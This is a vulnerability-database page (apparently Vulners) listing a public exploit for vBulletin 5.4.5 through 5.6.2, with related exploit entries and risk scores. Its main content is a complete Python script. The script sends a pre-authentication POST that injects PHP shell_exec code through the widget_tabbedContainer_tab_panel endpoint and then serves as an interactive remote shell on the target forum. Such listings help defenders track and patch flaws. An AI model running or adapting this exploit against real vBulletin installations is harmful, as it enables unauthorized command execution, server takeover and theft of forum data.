Vulners
Lucene search
vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
| Reporter | Title | Published | Views | Family All 68 |
|---|---|---|---|---|
 | vBulletin 5.x - Remote Command Execution Exploit | 1 Oct 201900:00 | – | zdt |
| vBulletin 5.5.4 Remote Command Execution Exploit #RCE | 11 Dec 201900:00 | – | zdt |
| vBulletin 5.6.2 - (widget_tabbedContainer_tab_panel) Remote Code Execution Exploit | 12 Aug 202000:00 | – | zdt |
| vBulletin 5.x Remote Code Execution Exploit | 12 Aug 202000:00 | – | zdt |
 | Exploit for Code Injection in Vbulletin | 16 Aug 202018:17 | – | githubexploit |
| Exploit for Code Injection in Vbulletin | 16 Aug 202018:17 | – | githubexploit |
| Exploit for Code Injection in Vbulletin | 26 Sep 201903:56 | – | githubexploit |
| Exploit for Code Injection in Vbulletin | 12 Oct 201918:51 | – | githubexploit |
| Exploit for Code Injection in Vbulletin | 24 Aug 202016:15 | – | githubexploit |
| Exploit for Code Injection in Vbulletin | 26 Sep 201903:27 | – | githubexploit |
10
# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
# Date: 2020-08-09
# Exploit Author: @zenofex
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: None
# Version: 5.4.5 through 5.6.2
# Tested on: vBulletin 5.6.2 on Ubuntu 19.04
# CVE : None
# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code
# execution vulnerability caused by incomplete patching of the previous
# "CVE-2019-16759" RCE. This logic bug allows for a single pre-auth
# request to execute PHP code on a target vBulletin forum.
#More info can be found at:
#https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
#!/usr/bin/env python3
# vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex
import argparse
import requests
import sys
def run_exploit(vb_loc, shell_cmd):
post_data = {'subWidgets[0][template]' : 'widget_php', 'subWidgets[0][config][code]' : "echo shell_exec('%s'); exit;" % shell_cmd}
r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)
return r.text
ap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')
ap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')
ARGS = ap.parse_args()
while True:
try:
cmd = input("vBulletin5$ ")
print(run_exploit(ARGS.location, cmd))
except KeyboardInterrupt:
sys.exit("\nClosing shell...")
except Exception as e:
sys.exit(str(e))Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Aug 2020 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 27.5
CVSS 3.19.8
EPSS0.9443
SSVC